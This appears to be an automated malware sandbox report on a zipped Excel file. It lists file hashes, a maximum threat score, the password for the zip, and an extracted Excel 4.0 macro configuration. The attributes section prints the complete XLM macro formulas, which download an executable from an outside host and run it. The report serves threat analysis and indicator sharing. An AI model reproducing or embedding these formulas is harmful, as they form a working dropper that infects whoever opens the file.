General

  • Target

    0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip

  • Size

    85KB

  • MD5

    846a85f7894f274965277103b41b3850

  • SHA1

    55d878269a78e1c4e3dc48b415adf77a8bcd2b49

  • SHA256

    cfb483de8ab7ff4bd338090a5991381e2bed527a1c026771fcaf03a101cf4afa

  • SHA512

    7da5fdf7123c5d9536165dc658c77a2e611826f11c413c6ee7b44a806ed0f094e4e33dae8f0251e35d46da0fe8fba7dc8f203fc0b7373ce6af2db5b2aea5e0cf

  • SSDEEP

    1536:GKgDB1ssb/C7ADrkM6Nkvsys2V7STuAkxiy92aJZFBLvMdBfJrTrzQT:WEs/CbNGVyuAkt92mFB4dBdQT

Score
10/10
xlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe

Attributes
  • formulas

    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj",0)
    =CALL("Kernel32","CreateDirectoryA","JCJ","C:\jhbtqNj\IOKVYnJ",0)
    =CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://rilaer.com/IfAmGZIJjbwzvKNTxSPM/ixcxmzcvqi.exe","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",0,0)
    =CALL("Shell32","ShellExecuteA","JJCCCCJ",0,"Open","C:\jhbtqNj\IOKVYnJ\KUdYCRk.exe",,0,0)
    =HALT()

Signatures

Files

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.zip
    .zip

    Password: infected

  • 0ff0692939044528e396512689cbb6ccee6d4ef14712b27c1efd832a00e24818.xlsx
    .xls .xlsx windows office2003